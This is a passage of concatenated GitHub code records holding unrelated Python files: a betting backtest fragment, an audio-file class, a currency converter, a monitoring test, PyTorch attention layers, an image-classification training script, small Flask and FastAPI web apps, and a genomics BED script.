scores_2['2'], scores_2['3+']]\n # _scores_1.sort(reverse=True)\n # _scores_2.sort(reverse=True)\n # if max(_scores_102) > 0.37 and max(_scores_102) < 0.9:\n # if int(m[0][2]) > int(m[0][3]):\n # counts_102[_scores_102.index(scores_102[1])] += 1\n # elif int(m[0][2]) == int(m[0][3]):\n # counts_102[_scores_102.index(scores_102[0])] += 1\n # else:\n # counts_102[_scores_102.index(scores_102[2])] += 1\n # try:\n # counts_numgoals[_scores_numgoals.index(scores_numgoals[int(m[0][2]) + int(m[0][3])])] += 1\n # except: pass\n # if int(m[0][2]) + int(m[0][3]) == 0:\n # counts_intervals[_scores_intervals.index(scores_intervals['0'])] += 1\n # elif int(m[0][2]) + int(m[0][3]) == 1:\n # counts_intervals[_scores_intervals.index(scores_intervals['1'])] += 1\n # elif int(m[0][2]) + int(m[0][3]) == 2:\n # counts_intervals[_scores_intervals.index(scores_intervals['2'])] += 1\n # else:\n # counts_intervals[_scores_intervals.index(scores_intervals['3+'])] += 1\n # if int(m[0][2]) == 0:\n # counts_singles[_scores_1.index(scores_1['0'])] += 1\n # if int(m[0][2]) == 1:\n # counts_singles[_scores_1.index(scores_1['1'])] += 1\n # if int(m[0][2]) == 2:\n # counts_singles[_scores_1.index(scores_1['2'])] += 1\n # if int(m[0][2]) >= 3:\n # counts_singles[_scores_1.index(scores_1['3+'])] += 1\n # if int(m[0][3]) == 0:\n # counts_singles[_scores_2.index(scores_2['0'])] += 1\n # if int(m[0][3]) == 1:\n # counts_singles[_scores_2.index(scores_2['1'])] += 1\n # if int(m[0][3]) == 2:\n # counts_singles[_scores_2.index(scores_2['2'])] += 1\n # if int(m[0][3]) >= 3:\n # counts_singles[_scores_2.index(scores_2['3+'])] += 1\n # scores.sort(key= lambda x: -x[1])\n # for i in range(8):\n # if scores[i][0] == (int(m[0][2]), int(m[0][3])):\n # counts_exacts[i] += 1\n # break\n\n\n # scores.sort(key= lambda x: -x[1])\n # print(m)\n # print('match score:')\n # #print(sum(map(lambda x: x[1], scores)))\n # for s in scores[:7]:\n # print(s)\n # print('sum of goals:')\n # for i in range(7):\n # print(i, scores_uo[i])\n # print('p1: ' + str(scores_102[1]) + ', p0: ' + str(scores_102[0]) + ', p2: ' + str(scores_102[2]))\n # print('********************')\n\n# print(counts_102)\n# print(counts_numgoals)\n# print(counts_intervals)\n# print(counts_singles)\n# print(counts_exacts)\n\nprint(counts_12)\nimport statsmodels.stats.proportion as sm\nprint(counts_12[0]/(counts_12[0]+counts_12[3]))\nprint(sm.proportion_confint(counts_12[0], counts_12[0]+counts_12[3]))","repo_name":"BG1992/Betting","sub_path":"bipoisson_bt.py","file_name":"bipoisson_bt.py","file_ext":"py","file_size_in_byte":9347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24871469990","text":"#!/usr/bin/env python\n# coding=utf-8\n\n\"\"\"\nA class representing an audio file.\n\"\"\"\n\nimport os\n\nimport aeneas.globalfunctions as gf\nfrom aeneas.ffprobewrapper import FFPROBEWrapper\nfrom aeneas.logger import Logger\n\n__author__ = \"Alberto Pettarin\"\n__copyright__ = \"\"\"\n Copyright 2012-2013, Alberto Pettarin (www.albertopettarin.it)\n Copyright 2013-2015, ReadBeyond Srl (www.readbeyond.it)\n \"\"\"\n__license__ = \"GNU AGPL v3\"\n__version__ = \"1.0.0\"\n__email__ = \"aeneas@readbeyond.it\"\n__status__ = \"Production\"\n\nclass AudioFile(object):\n \"\"\"\n A class representing an audio file.\n\n The properties of the audio file\n (length, format, etc.)\n will be set by the constructor\n invoking an audio file probe.\n (Currently,\n :class:`aeneas.ffprobewrapper.FFPROBEWrapper`\n )\n\n :param file_path: the 
path to the audio file\n :type file_path: string (path)\n :param logger: the logger object\n :type logger: :class:`aeneas.logger.Logger`\n \"\"\"\n\n TAG = \"AudioFile\"\n\n def __init__(self, file_path, logger=None):\n self.logger = logger\n if self.logger == None:\n self.logger = Logger()\n self.file_path = file_path\n self.file_size = None\n self.audio_length = None\n self.audio_format = None\n self.audio_sample_rate = None\n self.audio_channels = None\n self._read_properties()\n\n def _log(self, message, severity=Logger.DEBUG):\n self.logger.log(message, severity, self.TAG)\n\n def __str__(self):\n accumulator = \"\"\n accumulator += \"File path: %s\\n\" % self.file_path\n accumulator += \"File size (bytes): %s\\n\" % gf.safe_int(self.file_size)\n accumulator += \"Audio length (s): %s\\n\" % gf.safe_float(self.audio_length)\n accumulator += \"Audio format: %s\\n\" % self.audio_format\n accumulator += \"Audio sample rate: %s\\n\" % gf.safe_int(self.audio_sample_rate)\n accumulator += \"Audio channels: %s\" % gf.safe_int(self.audio_channels)\n return accumulator\n\n @property\n def file_path(self):\n \"\"\"\n The path of the audio file.\n\n :rtype: string\n \"\"\"\n return self.__file_path\n @file_path.setter\n def file_path(self, file_path):\n self.__file_path = file_path\n\n @property\n def file_size(self):\n \"\"\"\n The size, in bytes, of the audio file.\n\n :rtype: int\n \"\"\"\n return self.__file_size\n @file_size.setter\n def file_size(self, file_size):\n self.__file_size = file_size\n\n @property\n def audio_length(self):\n \"\"\"\n The length, in seconds, of the audio file.\n\n :rtype: float\n \"\"\"\n return self.__audio_length\n @audio_length.setter\n def audio_length(self, audio_length):\n self.__audio_length = audio_length\n\n @property\n def audio_format(self):\n \"\"\"\n The format of the audio file.\n\n :rtype: string\n \"\"\"\n return self.__audio_format\n @audio_format.setter\n def audio_format(self, audio_format):\n self.__audio_format = audio_format\n\n @property\n def audio_sample_rate(self):\n \"\"\"\n The sample rate of the audio file.\n\n :rtype: int\n \"\"\"\n return self.__audio_sample_rate\n @audio_sample_rate.setter\n def audio_sample_rate(self, audio_sample_rate):\n self.__audio_sample_rate = audio_sample_rate\n\n @property\n def audio_channels(self):\n \"\"\"\n The number of channels of the audio file.\n\n :rtype: int\n \"\"\"\n return self.__audio_channels\n @audio_channels.setter\n def audio_channels(self, audio_channels):\n self.__audio_channels = audio_channels\n\n def _read_properties(self):\n \"\"\"\n Populate this object by reading\n the audio properties of the file at the given path.\n\n Currently this function uses\n :class:`aeneas.ffprobewrapper.FFPROBEWrapper`\n to get the audio file properties.\n \"\"\"\n\n self._log(\"Reading properties\")\n\n # check the file can be read\n if not os.path.isfile(self.file_path):\n msg = \"File '%s' cannot be read\" % self.file_path\n self._log(msg, Logger.CRITICAL)\n raise OSError(msg)\n\n # get the file size\n self._log(\"Getting file size for '%s'\" % self.file_path)\n self.file_size = os.path.getsize(self.file_path)\n self._log(\"File size for '%s' is '%d'\" % (self.file_path, self.file_size))\n\n # get the audio properties\n self._log(\"Reading properties with FFPROBEWrapper...\")\n prober = FFPROBEWrapper(logger=self.logger)\n properties = prober.read_properties(self.file_path)\n self._log(\"Reading properties with FFPROBEWrapper... 
done\")\n\n        # save relevant properties in results inside the audiofile object\n        self.audio_length = gf.safe_float(properties[FFPROBEWrapper.STDOUT_DURATION])\n        self._log(\"Stored audio_length: '%s'\" % self.audio_length)\n        self.audio_format = properties[FFPROBEWrapper.STDOUT_CODEC_NAME]\n        self._log(\"Stored audio_format: '%s'\" % self.audio_format)\n        self.audio_sample_rate = gf.safe_int(properties[FFPROBEWrapper.STDOUT_SAMPLE_RATE])\n        self._log(\"Stored audio_sample_rate: '%s'\" % self.audio_sample_rate)\n        self.audio_channels = gf.safe_int(properties[FFPROBEWrapper.STDOUT_CHANNELS])\n        self._log(\"Stored audio_channels: '%s'\" % self.audio_channels)\n\n\n\n","repo_name":"garyfeng/aeneas","sub_path":"aeneas/audiofile.py","file_name":"audiofile.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"30068461293","text":"'''\nA simple currency converter. Sample solution\nMaximilian\n29.01.2023\n'''\n\n# function that performs the conversion\ndef usd(zahl):\n    erg = zahl * 1.0869\n    return erg\n\nwhile True:\n    # check whether the user made an invalid input\n    try:\n        print(\"---------------------------------------------------------------------\")\n        zahl = float(input(\"| How many euros do you want to convert to USD? \"))\n        print(\"---------------------------------------------------------------------\")\n        print(f\"|Original input: {zahl:^20.2f}€ | \" , f\" Converted to dollars: {usd(zahl):^20.2f}$ | \")\n        print(\"---------------------------------------------------------------------\")\n        break\n    # if it is a ValueError\n    except ValueError:\n        print(\"---------------------------------------------------------------------\")\n        print(\"You must enter a number!\")\n        continue\n    # for any other error\n    except:\n        print(\"Unknown error!\")\n        continue\n","repo_name":"Walnusskeim/Python_2.Kl","sub_path":"Python HÜ/Aufgabenstellung_für_Mitschüler.py","file_name":"Aufgabenstellung_für_Mitschüler.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33551050892","text":"# pylint: disable=protected-access,unused-variable\nimport datetime\n\nimport pytest\n\nfrom taxi.util import dates\n\nfrom scripts.monrun.checks import too_many_expired\n\nNOW = datetime.datetime(2019, 5, 30, 14)\n\n\n@pytest.mark.parametrize(\n    'script_docs',\n    [\n        [],\n        [{}],\n        [\n            {\n                'reason': 'expired',\n                'status': 'failed',\n                'updated': datetime.datetime(2019, 5, 20, 00),\n            },\n            {\n                'reason': 'expired',\n                'status': 'failed',\n                'updated': datetime.datetime(2019, 5, 30, 00),\n            },\n        ],\n    ],\n)\n@pytest.mark.config(\n    SCRIPTS_MONITORING_CONFIGS={\n        'too_many_expired': {'newer_then_delay': 1, 'threshold': 2},\n    },\n)\n@pytest.mark.now(NOW.isoformat())\nasync def test_check_ok(scripts_tasks_app, setup_scripts, script_docs):\n    await setup_scripts(script_docs)\n\n    result = await too_many_expired._check(scripts_tasks_app, None)\n    assert result == '0; OK'\n\n\n@pytest.mark.usefixtures('setup_many_scripts')\n@pytest.mark.now(NOW.isoformat())\n@pytest.mark.config(\n    SCRIPTS_MONITORING_CONFIGS={\n        'too_many_expired': {'newer_then_delay': 5, 'threshold': 1},\n    },\n)\nasync def test_check_warn(scripts_tasks_app):\n    result = await too_many_expired._check(scripts_tasks_app, None)\n    msg = (\n        '1; WARN: 1 scripts are expired and '\n        f'newer then {dates.timestring(NOW-datetime.timedelta(days=5))}'\n    )\n    assert result == 
msg\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_scripts/monrun/checks/test_too_many_expired.py","file_name":"test_too_many_expired.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32533410368","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\n#============================================================Freeze============================================================\ndef freeze_net(module):\n for p in module.parameters():\n p.requires_grad = False\n\ndef unfreeze_net(module):\n for p in module.parameters():\n p.requires_grad = True\n\ndef freeze_params(params):\n for p in params:\n p.requires_grad = False\n\ndef unfreeze_params(params):\n for p in params:\n p.requires_grad = True\n\n#============================================================MLP============================================================\nclass MLP(nn.Module):\n def __init__(self, in_dim, h_dim, out_dim, dropout, layer_norm=True):\n super().__init__()\n self.layer1 = nn.Linear(in_dim, h_dim)\n self.layerNorm = nn.LayerNorm(h_dim) if layer_norm else None\n self.dropout = nn.Dropout(dropout)\n self.layer2 = nn.Linear(h_dim, out_dim)\n self.activate = nn.Tanh()\n \n def forward(self, input):\n output = self.layer1(self.dropout(input))\n output = self.activate(output)\n if self.layerNorm:\n output = self.layerNorm(output)\n return self.layer2(output)\n\n#============================================================Embeddings============================================================\nclass CustomizedEmbedding(nn.Module):\n def __init__(self, concept_num, concept_in_dim, concept_out_dim, use_contextualized=False,\n pretrained_concept_emb=None, freeze_ent_emb=True, scale=1.0, init_range=0.02):\n super().__init__()\n self.scale = scale\n self.use_contextualized = use_contextualized\n if not use_contextualized:\n self.emb = nn.Embedding(concept_num, concept_in_dim, padding_idx=0)\n if pretrained_concept_emb is not None:\n self.emb.weight.data.fill_(0)\n self.emb.weight.data[:concept_num].copy_(pretrained_concept_emb)\n else:\n self.emb.weight.data.normal_(mean=0.0, std=init_range)\n if freeze_ent_emb:\n freeze_net(self.emb)\n\n if concept_in_dim != concept_out_dim:\n self.cpt_transform = nn.Linear(concept_in_dim, concept_out_dim)\n self.activation = nn.GELU()\n\n def forward(self, index, contextualized_emb=None):\n \"\"\"\n index: size (bz, a)\n contextualized_emb: size (bz, b, emb_size) (optional)\n \"\"\"\n if contextualized_emb is not None:\n assert index.size(0) == contextualized_emb.size(0)\n if hasattr(self, 'cpt_transform'):\n contextualized_emb = self.activation(self.cpt_transform(contextualized_emb * self.scale))\n else:\n contextualized_emb = contextualized_emb * self.scale\n emb_dim = contextualized_emb.size(-1)\n return contextualized_emb.gather(1, index.unsqueeze(-1).expand(-1, -1, emb_dim))\n else:\n if hasattr(self, 'cpt_transform'):\n return self.activation(self.cpt_transform(self.emb(index) * self.scale))\n else:\n return self.emb(index) * self.scale\n\n#============================================================Pooling Methods============================================================\nclass MaxPoolLayer(nn.Module):\n \"\"\"\n A layer that performs max pooling along the sequence dimension\n \"\"\"\n def __init__(self):\n super().__init__()\n\n def forward(self, inputs, mask_or_lengths):\n \"\"\"\n inputs: tensor of shape (batch_size, seq_len, 
hidden_size)\n mask_or_lengths: tensor of shape (batch_size) or (batch_size, seq_len)\n\n returns: tensor of shape (batch_size, hidden_size)\n \"\"\"\n bs, sl, _ = inputs.size()\n if len(mask_or_lengths.size()) == 1:\n mask = (torch.arange(sl, device=inputs.device).unsqueeze(0).expand(bs, sl) >= mask_or_lengths.unsqueeze(1))\n else:\n mask = mask_or_lengths\n masked_inputs = inputs.masked_fill(mask.unsqueeze(-1).expand_as(inputs), float('-inf'))\n max_pooled = masked_inputs.max(1)[0]\n return max_pooled\n\nclass MeanPoolLayer(nn.Module):\n \"\"\"\n A layer that performs mean pooling along the sequence dimension\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n def forward(self, inputs, mask_or_lengths):\n \"\"\"\n inputs: tensor of shape (batch_size, seq_len, hidden_size)\n mask_or_lengths: tensor of shape (batch_size) or (batch_size, seq_len)\n\n returns: tensor of shape (batch_size, hidden_size)\n \"\"\"\n bs, sl, _ = inputs.size()\n if len(mask_or_lengths.size()) == 1:\n mask = (torch.arange(sl, device=inputs.device).unsqueeze(0).expand(bs, sl) >= mask_or_lengths.unsqueeze(1))\n lengths = mask_or_lengths.float()\n else:\n mask, lengths = mask_or_lengths, (1 - mask_or_lengths.float()).sum(1)\n masked_inputs = inputs.masked_fill(mask.unsqueeze(-1).expand_as(inputs), 0.0)\n mean_pooled = masked_inputs.sum(1) / lengths.unsqueeze(-1)\n return mean_pooled\n\n\nclass MatrixVectorScaledDotProductAttention(nn.Module):\n def __init__(self, temperature, attn_dropout=0.1):\n super().__init__()\n self.temperature = temperature\n self.dropout = nn.Dropout(attn_dropout)\n self.softmax = nn.Softmax(dim=1)\n def forward(self, q, k, v, mask=None):\n \"\"\"\n q: tensor of shape (n*b, d_k)\n k: tensor of shape (n*b, l, d_k)\n v: tensor of shape (n*b, l, d_v)\n returns: tensor of shape (n*b, d_v), tensor of shape(n*b, l)\n \"\"\"\n attn = (q.unsqueeze(1) * k).sum(2) # (n*b, 1, d_k)*(n*b, l, d_k) -> (n*b, l)\n attn = attn / self.temperature\n if mask is not None:\n attn = attn.masked_fill(mask, -np.inf)\n attn = self.softmax(attn)\n attn = self.dropout(attn) #(n*b, l)\n output = (attn.unsqueeze(2) * v).sum(1) #(n*b, l, 1)*(n*b, l, d_v) -> (n*b, d_v)\n return output, attn\n\n\nclass AttPoolLayer(nn.Module):\n def __init__(self, d_q, d_k, dropout=0.1):\n super().__init__()\n self.w_qs = nn.Linear(d_q, d_k)\n nn.init.normal_(self.w_qs.weight, mean=0, std=np.sqrt(2.0 / (d_q + d_k)))\n self.attention = MatrixVectorScaledDotProductAttention(temperature=np.power(d_k, 0.5))\n self.dropout = nn.Dropout(dropout)\n def forward(self, q, k, mask=None):\n \"\"\"\n q: tensor of shape (b, d_q)\n k: tensor of shape (b, l, d_k)\n mask: tensor of shape (b, l) (optional, default None)\n returns: tensor of shape (b, d_k)\n \"\"\"\n qs = self.w_qs(q) # (b, d_k)\n output, attn = self.attention(qs, k, k, mask=mask)\n output = self.dropout(output)\n return output, attn\n\nclass MultiheadAttPoolLayer(nn.Module):\n\n def __init__(self, n_head, d_q_original, d_k_original, dropout=0.1):\n super().__init__()\n assert d_k_original % n_head == 0 # make sure the output dimension equals to d_k_origin\n self.n_head = n_head\n self.d_k = d_k_original // n_head\n self.d_v = d_k_original // n_head\n\n self.w_qs = nn.Linear(d_q_original, n_head * self.d_k)\n self.w_ks = nn.Linear(d_k_original, n_head * self.d_k)\n self.w_vs = nn.Linear(d_k_original, n_head * self.d_v)\n\n nn.init.normal_(self.w_qs.weight, mean=0, std=np.sqrt(2.0 / (d_q_original + self.d_k)))\n nn.init.normal_(self.w_ks.weight, mean=0, std=np.sqrt(2.0 / (d_k_original + 
self.d_k)))\n        nn.init.normal_(self.w_vs.weight, mean=0, std=np.sqrt(2.0 / (d_k_original + self.d_v)))\n\n        self.attention = MatrixVectorScaledDotProductAttention(temperature=np.power(self.d_k, 0.5))\n        self.dropout = nn.Dropout(dropout)\n\n    def forward(self, q, k, mask=None):\n        \"\"\"\n        q: tensor of shape (b, d_q_original)\n        k: tensor of shape (b, l, d_k_original)\n        mask: tensor of shape (b, l) (optional, default None)\n        returns: tensor of shape (b, n*d_v)\n        \"\"\"\n        n_head, d_k, d_v = self.n_head, self.d_k, self.d_v # d_k_original must be divisible by n_head -> e.g. n_head = 2 or 4\n\n        bs, _ = q.size()\n        bs, len_k, _ = k.size()\n\n        qs = self.w_qs(q).view(bs, n_head, d_k) # (b, d_q_ori) -> (b, n_head*d_k) -> (b, n_head, d_k)\n        ks = self.w_ks(k).view(bs, len_k, n_head, d_k) # (b, l, d_k_ori) -> (b, l, n_head*d_k) -> (b, l, n_head, d_k)\n        vs = self.w_vs(k).view(bs, len_k, n_head, d_v) # (b, l, n_head, d_v)\n\n        qs = qs.permute(1, 0, 2).contiguous().view(n_head * bs, d_k) #(n_head * bs, d_k)\n        ks = ks.permute(2, 0, 1, 3).contiguous().view(n_head * bs, len_k, d_k) #(n_head * bs, len_k, d_k)\n        vs = vs.permute(2, 0, 1, 3).contiguous().view(n_head * bs, len_k, d_v) #(n_head * bs, len_k, d_v)\n\n        if mask is not None:\n            mask = mask.bool() ##\n            mask = ~mask ##\n            mask = mask.repeat(n_head, 1) #(n_head*bs, len_k)\n        output, attn = self.attention(qs, ks, vs, mask=mask)# (n*b, d_v), (n*b, l)\n\n        output = output.view(n_head, bs, d_v)\n        output = output.permute(1, 0, 2).contiguous().view(bs, n_head * d_v) # (b, n*dv)\n        output = self.dropout(output)\n        return output, attn\n\nclass BilinearAttentionLayer(nn.Module):\n    def __init__(self, query_dim, value_dim):\n        super().__init__()\n        self.linear = nn.Linear(value_dim, query_dim, bias=False)\n        self.softmax = nn.Softmax(1)\n    def forward(self, query, value, node_mask=None):\n        \"\"\"\n        query: tensor of shape (batch_size, query_dim)\n        value: tensor of shape (batch_size, seq_len, value_dim)\n        node_mask: tensor of shape (batch_size, seq_len)\n\n        returns: tensor of shape (batch_size, value_dim)\n        \"\"\"\n        attn = self.linear(value).bmm(query.unsqueeze(-1)) #(bs, seq_len, query_dim) * (bs, query_dim, 1) -> (bs, seq_len, 1)\n        attn = self.softmax(attn.squeeze(-1)) #(bs, seq_len)\n        if node_mask is not None:\n            attn = attn * node_mask\n            attn = attn / attn.sum(1, keepdim=True)\n        pooled = attn.unsqueeze(1).bmm(value).squeeze(1) #(bs, 1, seq_len) * (bs, seq_len, value_dim) -> (bs,1,value_dim) -> (bs, value_dim)\n        return pooled, attn","repo_name":"Anni-Zou/Decker","sub_path":"model/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":10349,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"66"} +{"seq_id":"19831273407","text":"from efficientnet_pytorch import EfficientNet\nfrom transformers import get_cosine_schedule_with_warmup\nfrom label_smoothing import apply_label_smoothing\nfrom data import test, submission\nfrom dataloader import loader_train, loader_valid, loader_test, loader_tta\nfrom train import train_val\nimport torch\nimport torch.nn as nn\nimport random\nimport numpy as np\nimport os\n\n# Fix the random seeds for reproducibility\nseed = 10\nos.environ['PYTHONHASHSEED'] = str(seed)\nrandom.seed(seed)\nnp.random.seed(seed)\ntorch.manual_seed(seed)\ntorch.cuda.manual_seed(seed)\ntorch.cuda.manual_seed_all(seed)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\ntorch.backends.cudnn.enabled = False\n\n# GPU\ndevice = torch.device('cuda:0')\n\n# Hyperparameters\nbatch_size = 32\nepochs = 3\nalpha = 0.001\nthreshold = 0.999\ntarget = 
['healthy', 'multiple_diseases', 'rust', 'scab']\n\n# Build the model\nmodel = EfficientNet.from_pretrained('efficientnet-b0', num_classes=4)\nmodel = model.to(device)\n\n# Loss function, optimizer, scheduler\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.AdamW(model.parameters(), lr=0.00006, weight_decay=0.0001)\nscheduler = get_cosine_schedule_with_warmup(optimizer, \n                                            num_warmup_steps=len(loader_train)*5,\n                                            num_training_steps=len(loader_train)*epochs)\n\n# Train the model and validate its performance\ntrain_val(model, epochs, loader_train, loader_valid, optimizer, criterion, scheduler)\n\n# Prediction (1): plain test-set inference\nmodel.eval()\npreds = np.zeros((len(test), 4))\nwith torch.no_grad():\n    for i, images in enumerate(loader_test):\n        images = images.to(device)\n        outputs = model(images)\n        preds_part = torch.softmax(outputs.cpu(), dim=1).squeeze().numpy()\n        preds[i*batch_size:(i+1)*batch_size] += preds_part\n\n# Submission (1)\nsubmission_test = submission.copy()\nsubmission_test[['healthy', 'multiple_diseases', 'rust', 'scab']] = preds\nsubmission_test.to_csv('submission_test.csv', index=False)\nsubmission_test_ls = submission_test.copy()\nsubmission_test_ls[target] = apply_label_smoothing(submission_test_ls, target, alpha, threshold)\nsubmission_test_ls.to_csv('submission_test_ls.csv', index=False)\n\n# Prediction (2): test-time augmentation (TTA)\nnum_tta = 5\npreds_tta = np.zeros((len(test), 4))\nfor _ in range(num_tta):\n    with torch.no_grad():\n        for i, images in enumerate(loader_tta):\n            images = images.to(device)\n            outputs = model(images)\n            preds_part = torch.softmax(outputs.cpu(), dim=1).squeeze().numpy()\n            preds_tta[i*batch_size:(i+1)*batch_size] += preds_part\npreds_tta /= num_tta\n\n# Submission (2)\nsubmission_tta = submission.copy()\nsubmission_tta[['healthy', 'multiple_diseases', 'rust', 'scab']] = preds_tta\nsubmission_tta.to_csv('submission_tta.csv', index=False)\nsubmission_tta_ls = submission_tta.copy()\nsubmission_tta_ls[target] = apply_label_smoothing(submission_tta_ls, target, alpha, threshold)\nsubmission_tta_ls.to_csv('submission_tta_ls.csv', index=False)","repo_name":"chaiminwoo0223/Data-Science","sub_path":"09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29379382682","text":"from flask import Flask, render_template, redirect, jsonify\nfrom food import Food\nfrom foodProducer import FoodProducer\nfrom flask_cors import CORS\nimport requests\nimport urllib.parse\n\napp = Flask(__name__,static_url_path='', template_folder=\"../FrontEnd\", static_folder=\"../FrontEnd\")\nCORS(app)\n\n\n# path = \"35.203.43.136\"\n# local = \"127.0.0.1\"\n\n\n@app.route('/main')\ndef hello_world():\n    return 'test!'\n\n\n# @app.route('/<page_name>/')\n# def render_static(page_name):\n#     print(\"Getting: \" + page_name)\n#     return render_template('%s' % page_name)\n\n\n@app.route(\"/\")\ndef main_page():\n    return render_template('index.html')\n\n\n@app.route(\"/api/search/<food>\")\ndef search_food(food):\n    food = urllib.parse.unquote_plus(urllib.parse.unquote(food))\n    result = foodset.search_food(food)\n    print(\"Foodset search: \" + str(result))\n    return jsonify(result)\n\n\n@app.route(\"/api/food/<id>\")\ndef get_food(id: str):\n    food = foodset.get_food(int(id))\n    if food is None:\n        return {}\n    return food.to_json()\n\n\n@app.route(\"/api/link/<id>\")\ndef does_site_load(id: str):\n    f = foodset.get_food(int(id))\n    req = requests.get(f.recipe_url)\n    if \"X-Frame-Options\" not in req.headers:\n        return \"True\"\n    elif req.headers[\"X-Frame-Options\"].strip().lower() in [\"deny\", \"sameorigin\"]:\n        
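# DENY and SAMEORIGIN both stop the page from loading in an iframe,\n        # so report \"False\"; any other header value falls through to \"True\".\n        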
return \"False\"\n return \"True\"\n\n\nif __name__ == '__main__':\n foodset = FoodProducer()\n app.run(host='0.0.0.0', debug=True, port=80)\n","repo_name":"SachaGoldman/FeelingHungry","sub_path":"BackEnd/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"1707871992","text":"from fastapi import FastAPI, Request, Form\r\nfrom fastapi.templating import Jinja2Templates\r\nfrom fastapi.staticfiles import StaticFiles\r\n\r\nimport io, base64\r\nimport numpy as np\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\n\r\napp = FastAPI()\r\napp.mount('/static', StaticFiles(directory='static'), name='static')\r\ntemplates = Jinja2Templates(directory='templates')\r\n\r\ndef __solve(a: int, b: int, c: int):\r\n roots = np.roots([a, b, c])\r\n roots = roots[~np.iscomplex(roots)]\r\n roots = np.unique(roots).tolist()\r\n roots.sort()\r\n return roots\r\n\r\ndef __quadeqeval(a: int, b: int, c: int, x: np.array):\r\n return a*x**2 + b*x + c\r\n\r\ndef __create_func_label(a: int, b: int, c: int):\r\n label = str()\r\n if a != 0:\r\n label += f'{a}x^2'\r\n if b > 0:\r\n label += f'+{b}x'\r\n elif b < 0:\r\n label += f'{b}x'\r\n if c > 0:\r\n label += f'+{c}'\r\n elif c < 0:\r\n label += f'{c}'\r\n \r\n return label\r\n\r\n@app.get('/solve')\r\nasync def solve(a, b, c):\r\n coeffs = tuple(map(int, (a, b, c)))\r\n if coeffs[0] == coeffs[1] == coeffs[2] == 0:\r\n return {'message': 'One of the coefficients must be non-zero'}\r\n roots = __solve(*coeffs)\r\n return {'roots': roots}\r\n\r\n@app.get('/main')\r\nasync def home(request: Request):\r\n return templates.TemplateResponse('main.html',\r\n {'request': request})\r\n\r\n@app.post('/show_plot')\r\nasync def show_plot(request: Request,\r\n a_coef: int = Form(...),\r\n b_coef: int = Form(...),\r\n c_coef: int = Form(...)):\r\n if a_coef == b_coef == c_coef == 0:\r\n return {'message': 'One of the coefficients must be non-zero'}\r\n roots = __solve(*(a_coef, b_coef, c_coef))\r\n if a_coef != 0:\r\n vertex = -int(b_coef / (2 * a_coef))\r\n else:\r\n vertex = roots[0] if len(roots) != 0 else 0\r\n\r\n x = np.linspace(-10 + vertex, vertex + 10, 1000)\r\n y = __quadeqeval(a_coef, b_coef, c_coef, x)\r\n \r\n fig = plt.figure()\r\n plt.plot(x, y, label=f'$y={__create_func_label(a_coef, b_coef, c_coef)}$')\r\n if len(roots) != 0:\r\n plt.scatter(roots, np.zeros(len(roots)), marker='x', c='r', label='roots')\r\n plt.axhline(0, c='k', alpha=.5)\r\n plt.axvline(0, c='k', alpha=.5)\r\n plt.xlabel('$x$')\r\n plt.ylabel('$y$')\r\n plt.grid()\r\n plt.legend()\r\n \r\n pngImage = io.BytesIO()\r\n fig.savefig(pngImage)\r\n pngImageB64String = base64.b64encode(pngImage.getvalue()).decode('ascii')\r\n\r\n return templates.TemplateResponse('plot.html',\r\n {'request': request,\r\n 'picture': pngImageB64String,\r\n 'roots': roots})","repo_name":"Temyaroslav/MDS2020","sub_path":"data_scraping/week9/fastapi_quadratic/server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"10600686503","text":"#!usr/lib/python\n# -*- coding:utf-8 -*-\n\n##------------------------------------------------------------------------------------------------\n##------------------------------------------------------------------------------------------------\n## Usage:\n## python *.py gene_CDS.bed score.bed 
chromosome\n##------------------------------------------------------------------------------------------------\n##------------------------------------------------------------------------------------------------\n\nfrom __future__ import division\nimport sys\nimport os\nimport subprocess\n\n\ndb1=os.path.abspath(sys.argv[1]) \nfullname=os.path.basename(db1)\nname1=os.path.splitext(fullname)[0]\nbed=sys.argv[2] \nkeyword=sys.argv[3] \n\ndef head():\n f1=open(db1,'r')\n f3=open('%s.gene_dengfen'%(name1),'w')\n f4=open('%s.gene_ave_median'%(name1),'w')\n f11=f1.readlines()\n os.system('sort -k1,1 -k2,2n %s>sort-k2-%s'%(db1,name1))\n min0=subprocess.Popen('''head -n1 sort-k2-%s|awk '{print $2}' '''%(name1),shell=True,stdout=subprocess.PIPE)\n mini=min0.communicate()[0].strip('\\n')\n os.system('sort -k1,1 -k3,3n %s>sort-k3-%s'%(db1,name1))\n maxi0=subprocess.Popen('''tail -n1 sort-k3-%s|awk '{print $3}' '''%(name1),shell=True,stdout=subprocess.PIPE)\n maxi=maxi0.communicate()[0].strip('\\n')\n os.system('''grep %s$\"\\t\" %s|awk -F '\\t' '{if(%s<=$2&&$3<=%s)print $0}' >%s.part.bed'''%(keyword,bed,mini,maxi,name1))\n f2=open('%s.part.bed'%(name1),'r')\n f22=f2.readlines()\n lines=len(f11)\n ac=''\n for i in range(lines):\n #chr_os=f11[i].split()[0]\n #start_os=int(f11[i].split()[1])\n #end_os=int(f11[i].split()[2])\n gene_ID=f11[i].split()[3]\n cds=f11[i].split()[5][:-1]\n dire=f11[i].split()[4]\n num=0\n list1=[]\n for k in cds.split(';'):\n 